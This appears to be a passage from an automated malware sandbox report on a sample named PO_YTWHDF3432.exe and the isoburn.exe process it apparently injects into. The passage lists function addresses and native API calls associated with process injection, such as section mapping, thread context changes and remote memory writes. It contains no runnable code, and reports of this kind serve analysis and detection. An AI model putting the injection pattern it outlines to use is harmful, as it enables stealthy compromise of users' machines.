            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004012803_2_00401280
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00402BC93_2_00402BC9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00402C403_2_00402C40
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004164433_2_00416443
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00402C3D3_2_00402C3D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0041643E3_2_0041643E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004025203_2_00402520
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040FF0A3_2_0040FF0A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040FF133_2_0040FF13
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00402FC03_2_00402FC0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0042A7E33_2_0042A7E3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B01AA3_2_019B01AA
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A81CC3_2_019A81CC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198A1183_2_0198A118
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E01003_2_018E0100
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019781583_2_01978158
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019820003_2_01982000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B03E63_2_019B03E6
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE3F03_2_018FE3F0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AA3523_2_019AA352
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019702C03_2_019702C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019902743_2_01990274
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B05913_2_019B0591
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F05353_2_018F0535
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199E4F63_2_0199E4F6
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019944203_2_01994420
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A24463_2_019A2446
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EC7C03_2_018EC7C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019147503_2_01914750
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F07703_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190C6E03_2_0190C6E0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A03_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019BA9A63_2_019BA9A6
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019069623_2_01906962
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D68B83_2_018D68B8
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191E8F03_2_0191E8F0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FA8403_2_018FA840
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A6BD73_2_019A6BD7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA803_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01908DBF3_2_01908DBF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EADE03_2_018EADE0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198CD1F3_2_0198CD1F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FAD003_2_018FAD00
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01990CB53_2_01990CB5
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0CF23_2_018E0CF2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0C003_2_018F0C00
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196EFA03_2_0196EFA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E2FC83_2_018E2FC8
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FCFE03_2_018FCFE0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01910F303_2_01910F30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01992F303_2_01992F30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01932F283_2_01932F28
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01964F403_2_01964F40
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902E903_2_01902E90
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019ACE933_2_019ACE93
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AEEDB3_2_019AEEDB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AEE263_2_019AEE26
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0E593_2_018F0E59
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FB1B03_2_018FB1B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019BB16B3_2_019BB16B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192516C3_2_0192516C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DF1723_2_018DF172
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F70C03_2_018F70C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199F0CC3_2_0199F0CC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A70E93_2_019A70E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AF0E03_2_019AF0E0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0193739A3_2_0193739A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A132D3_2_019A132D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DD34C3_2_018DD34C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F52A03_2_018F52A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190B2C03_2_0190B2C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019912ED3_2_019912ED
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198D5B03_2_0198D5B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A75713_2_019A7571
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AF43F3_2_019AF43F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E14603_2_018E1460
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AF7B03_2_019AF7B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E17EC3_2_018E17EC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A16CC3_2_019A16CC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019859103_2_01985910
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190B9503_2_0190B950
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F99503_2_018F9950
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F38E03_2_018F38E0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195D8003_2_0195D800
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190FB803_2_0190FB80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01965BF03_2_01965BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192DBF93_2_0192DBF9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AFB763_2_019AFB76
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01935AA03_2_01935AA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198DAAC3_2_0198DAAC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01991AA33_2_01991AA3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199DAC63_2_0199DAC6
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AFA493_2_019AFA49
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A7A463_2_019A7A46
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01963A6C3_2_01963A6C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190FDC03_2_0190FDC0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A1D5A3_2_019A1D5A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F3D403_2_018F3D40
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A7D733_2_019A7D73
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01969C323_2_01969C32
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F1F923_2_018F1F92
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AFFB13_2_019AFFB1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018B3FD23_2_018B3FD2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018B3FD53_2_018B3FD5
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AFF093_2_019AFF09
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F9EB03_2_018F9EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541053511_2_05410535
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054D059111_2_054D0591
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C244611_2_054C2446
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054B442011_2_054B4420
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054BE4F611_2_054BE4F6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0543475011_2_05434750
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541077011_2_05410770
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0540C7C011_2_0540C7C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542C6E011_2_0542C6E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0549815811_2_05498158
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0540010011_2_05400100
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054AA11811_2_054AA118
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C81CC11_2_054C81CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054D01AA11_2_054D01AA
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C41A211_2_054C41A2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054A200011_2_054A2000
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CA35211_2_054CA352
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054D03E611_2_054D03E6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541E3F011_2_0541E3F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054B027411_2_054B0274
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054902C011_2_054902C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541AD0011_2_0541AD00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054ACD1F11_2_054ACD1F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0540ADE011_2_0540ADE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05428DBF11_2_05428DBF
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05410C0011_2_05410C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05400CF211_2_05400CF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054B0CB511_2_054B0CB5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05484F4011_2_05484F40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05452F2811_2_05452F28
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05430F3011_2_05430F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054B2F3011_2_054B2F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05402FC811_2_05402FC8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541CFE011_2_0541CFE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0548EFA011_2_0548EFA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05410E5911_2_05410E59
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CEE2611_2_054CEE26
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CEEDB11_2_054CEEDB
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05422E9011_2_05422E90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CCE9311_2_054CCE93
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542696211_2_05426962
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054129A011_2_054129A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054DA9A611_2_054DA9A6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541A84011_2_0541A840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541284011_2_05412840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053F68B811_2_053F68B8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0543E8F011_2_0543E8F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CAB4011_2_054CAB40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C6BD711_2_054C6BD7
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0540EA8011_2_0540EA80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C757111_2_054C7571
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054AD5B011_2_054AD5B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0540146011_2_05401460
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CF43F11_2_054CF43F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054017EC11_2_054017EC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CF7B011_2_054CF7B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0545563011_2_05455630
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C16CC11_2_054C16CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054DB16B11_2_054DB16B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0544516C11_2_0544516C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053FF17211_2_053FF172
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541B1B011_2_0541B1B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054170C011_2_054170C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054BF0CC11_2_054BF0CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C70E911_2_054C70E9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CF0E011_2_054CF0E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C132D11_2_054C132D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053FD34C11_2_053FD34C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0545739A11_2_0545739A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542B2C011_2_0542B2C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054B12ED11_2_054B12ED
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054152A011_2_054152A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05413D4011_2_05413D40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C1D5A11_2_054C1D5A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C7D7311_2_054C7D73
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542FDC011_2_0542FDC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05489C3211_2_05489C32
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFCF211_2_054CFCF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFF0911_2_054CFF09
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05411F9211_2_05411F92
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053D3FD511_2_053D3FD5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053D3FD211_2_053D3FD2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFFB111_2_054CFFB1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05419EB011_2_05419EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541995011_2_05419950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542B95011_2_0542B950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054A591011_2_054A5910
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0547D80011_2_0547D800
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054138E011_2_054138E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFB7611_2_054CFB76
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05485BF011_2_05485BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0544DBF911_2_0544DBF9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542FB8011_2_0542FB80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFA4911_2_054CFA49
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C7A4611_2_054C7A46
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05483A6C11_2_05483A6C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054BDAC611_2_054BDAC6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05455AA011_2_05455AA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054ADAAC11_2_054ADAAC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054B1AA311_2_054B1AA3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ED1A1011_2_02ED1A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ECAEE011_2_02ECAEE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ECCE6011_2_02ECCE60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ECCC4011_2_02ECCC40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ECCC3711_2_02ECCC37
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ED316B11_2_02ED316B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ED317011_2_02ED3170
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE751011_2_02EE7510
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 0196F290 appears 105 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 01937E54 appears 100 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 018DB970 appears 283 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 0195EA12 appears 86 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 01925130 appears 58 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05445130 appears 58 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0548F290 appears 105 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 053FB970 appears 283 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0547EA12 appears 86 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05457E54 appears 109 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040A953 NtMapViewOfSection,3_2_0040A953
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040A123 NtSetContextThread,3_2_0040A123
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040B213 NtDelayExecution,3_2_0040B213
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040AB73 NtCreateFile,3_2_0040AB73
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040A323 NtResumeThread,3_2_0040A323
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00428453 NtClose,3_2_00428453
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00409D23 NtSuspendThread,3_2_00409D23
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040ADA3 NtReadFile,3_2_0040ADA3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040B623 NtAllocateVirtualMemory,3_2_0040B623
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00409F23 NtGetContextThread,3_2_00409F23
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040A733 NtCreateSection,3_2_0040A733
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922B60 NtClose,LdrInitializeThunk,3_2_01922B60
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01922DF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01922C70
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019235C0 NtCreateMutant,LdrInitializeThunk,3_2_019235C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01924340 NtSetContextThread,3_2_01924340
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01924650 NtSuspendThread,3_2_01924650
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922B80 NtQueryInformationFile,3_2_01922B80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922BA0 NtEnumerateValueKey,3_2_01922BA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922BF0 NtAllocateVirtualMemory,3_2_01922BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922BE0 NtQueryValueKey,3_2_01922BE0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922AB0 NtWaitForSingleObject,3_2_01922AB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922AD0 NtReadFile,3_2_01922AD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922AF0 NtWriteFile,3_2_01922AF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922DB0 NtEnumerateKey,3_2_01922DB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922DD0 NtDelayExecution,3_2_01922DD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922D10 NtMapViewOfSection,3_2_01922D10
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922D00 NtSetInformationFile,3_2_01922D00
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922D30 NtUnmapViewOfSection,3_2_01922D30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922CA0 NtQueryInformationToken,3_2_01922CA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922CC0 NtQueryVirtualMemory,3_2_01922CC0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922CF0 NtOpenProcess,3_2_01922CF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922C00 NtQueryInformationProcess,3_2_01922C00
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922C60 NtCreateKey,3_2_01922C60
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922F90 NtProtectVirtualMemory,3_2_01922F90
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922FB0 NtResumeThread,3_2_01922FB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922FA0 NtQuerySection,3_2_01922FA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922FE0 NtCreateFile,3_2_01922FE0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922F30 NtCreateSection,3_2_01922F30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922F60 NtCreateProcessEx,3_2_01922F60
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922E80 NtReadVirtualMemory,3_2_01922E80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922EA0 NtAdjustPrivilegesToken,3_2_01922EA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922EE0 NtQueueApcThread,3_2_01922EE0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922E30 NtWriteVirtualMemory,3_2_01922E30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01923090 NtSetValueKey,3_2_01923090
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01923010 NtOpenDirectoryObject,3_2_01923010
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019239B0 NtGetContextThread,3_2_019239B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01923D10 NtOpenProcessToken,3_2_01923D10
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01923D70 NtOpenThread,3_2_01923D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05444650 NtSuspendThread,LdrInitializeThunk,11_2_05444650
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05444340 NtSetContextThread,LdrInitializeThunk,11_2_05444340
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442D10 NtMapViewOfSection,LdrInitializeThunk,11_2_05442D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_05442D30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442DD0 NtDelayExecution,LdrInitializeThunk,11_2_05442DD0
